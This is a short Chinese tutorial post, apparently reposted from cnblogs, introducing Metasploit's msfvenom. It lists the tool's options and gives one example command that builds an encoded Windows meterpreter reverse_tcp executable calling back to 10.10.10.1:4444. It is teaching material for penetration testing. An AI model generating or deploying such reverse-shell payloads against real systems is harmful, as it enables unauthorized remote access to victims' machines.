metasploit之msfvenom功能

2020-12-13 16:07

阅读:591

标签:http   os   for   c   一个   io   

有木有常常需要把msfpayload获得的内容通过R命令导入管道输出至msfencode中进行编码,有木有觉得这一切很麻烦,

metasploit的开发人员早就想到了。msfvenom是msfpayload和msfencode的结合体,用起来更方便了。

Usage:msfvenom [options]

Options:
    -p, --payload           Payload to use. Specify a ‘-‘ or stdin to use custom payloads
    -l, --list       [module_type]   List a module type example: payloads, encoders, nops, all
    -n, --nopsled            Prepend a nopsled of [length] size on to the payload
    -f, --format             Output format (use --help-formats for a list)
    -e, --encoder    [encoder]       The encoder to use
    -a, --arch         The architecture to use:
        --platform         The platform of the payload
    -s, --space              The maximum size of the resulting payload
    -b, --bad-chars            The list of characters to avoid example: ‘\x00\xff‘
    -i, --iterations          The number of times to encode the payload
    -c, --add-code             Specify an additional win32 shellcode file to include
    -x, --template             Specify a custom executable file to use as a template
    -k, --keep                       Preserve the template behavior and inject the payload as a new thread
    -o, --options                    List the payload‘s standard options
    -h, --help                       Show this message
        --help-formats               List available formats

example:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.1 LPORT=4444 -e x86/shikata_ga_nai -b ‘0x00‘ -i 5 -f exe >test.exe

 

同时分享一个比较好的metasploit学习网站:

http://www.offensive-security.com/metasploit-unleashed/Main_Page

免费学习,捐赠的资金用于资助贫困地区的教育。

metasploit之msfvenom功能,搜素材,soscw.com

metasploit之msfvenom功能

标签:http   os   for   c   一个   io   

原文地址:http://www.cnblogs.com/Chorder/p/3797776.html


评论


亲,登录后才可以留言!